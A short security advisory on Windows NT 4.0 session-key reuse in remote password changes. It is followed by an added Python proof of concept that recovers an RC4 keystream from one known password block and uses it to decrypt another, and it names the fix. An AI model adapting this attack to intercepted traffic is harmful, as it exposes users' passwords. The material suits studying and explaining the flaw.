NT Subject to User Session Key Reuse. Reported June 5 by Luke Kenneth Casson Leighton
Windows NT 4.0
When an administrator uses USRMGR.EXE or SRVMGR.EXE to remotely add users or workstations to
a domain, or to change a user's password, the tool sends an encrypted 516-byte password
block over the network. The data block can be intercepted and systematically taken apart
to reveal a User Session Key, which can then be used to decrypt further communication
intercepted between the administrator and the domain controllers. For example, if an
administrator changes a user's password remotely, that password could be decrypted to
reveal the clear-text version using the captured User Session Key.
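The following is an added worked example, not code from the advisory or from Microsoft, showing why a reused session key is fatal here. It assumes (as the advisory's description implies but does not spell out) that the 516-byte block is a 512-byte buffer holding the new password in UTF-16LE, right-aligned and zero-padded, followed by a 4-byte little-endian byte length, and that the whole block is encrypted with the RC4 stream cipher keyed by the User Session Key and restarted for every message. The session key, both passwords and the "admin sets a known initial password, then changes another user's password" sequence are constructed for the demonstration. Note that with a stream cipher what the known plaintext yields directly is the keystream derived from the session key; that is all an eavesdropper needs as long as the same key is used for later messages, which is the reuse the advisory reports.

```python
"""Keystream recovery and reuse against an RC4-encrypted 516-byte password block.
Added example with constructed data; the block layout and use of RC4 are assumptions."""
import os

BUFFER_LEN = 512          # assumed: password buffer, right-aligned, zero-padded
BLOCK_LEN = BUFFER_LEN + 4  # assumed: 4-byte little-endian length appended -> 516 bytes


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key-scheduling + output generation).  Same key -> same keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_password_block(password: str) -> bytes:
    """Assumed plaintext layout: zero padding, then UTF-16LE password, then its byte length."""
    pw = password.encode("utf-16-le")
    if len(pw) > BUFFER_LEN:
        raise ValueError("password does not fit the 512-byte buffer")
    padding = bytes(BUFFER_LEN - len(pw))   # predictable padding = known plaintext
    return padding + pw + len(pw).to_bytes(4, "little")


def parse_password_block(block: bytes) -> str:
    """Inverse of build_password_block: read the length, slice the password out."""
    if len(block) != BLOCK_LEN:
        raise ValueError("expected a 516-byte block")
    length = int.from_bytes(block[BUFFER_LEN:], "little")
    return block[BUFFER_LEN - length:BUFFER_LEN].decode("utf-16-le")


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Stream cipher: C = P xor KS, so KS = C xor P wherever P is known."""
    return xor(ciphertext, known_plaintext)


def eavesdropper_attack(captured_known: bytes, known_password: str,
                        captured_target: bytes) -> str:
    """Given one captured block whose password the attacker knows (e.g. the initial
    password the admin assigned to the attacker's own new account), recover the
    516-byte keystream and strip it off a second block sent under the same session key."""
    keystream = recover_keystream(captured_known, build_password_block(known_password))
    return parse_password_block(xor(captured_target, keystream))


def demo() -> str:
    """Constructed session: same session key reused for two remote password changes."""
    session_key = os.urandom(16)                 # constructed; never learned by the attacker
    attacker_initial_pw = "Welcome1"             # constructed: admin-assigned, known to attacker
    victim_new_pw = "Tr0ub4dor&3"                # constructed: what the attacker wants
    c1 = rc4(session_key, build_password_block(attacker_initial_pw))   # sniffed message 1
    c2 = rc4(session_key, build_password_block(victim_new_pw))         # sniffed message 2
    return eavesdropper_attack(c1, attacker_initial_pw, c2)


if __name__ == "__main__":
    print("recovered victim password:", demo())
```

The fix is not a stronger cipher but a fresh key (or a fresh nonce folded into the key) for every message: the attack in `eavesdropper_attack` depends only on `rc4(session_key, ...)` producing the same keystream twice, and nothing else about the protocol.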
Microsoft is aware of this matter; however, no response was known at the time of this writing.
CREDITS Discovered and reported by Luke Kenneth Casson Leighton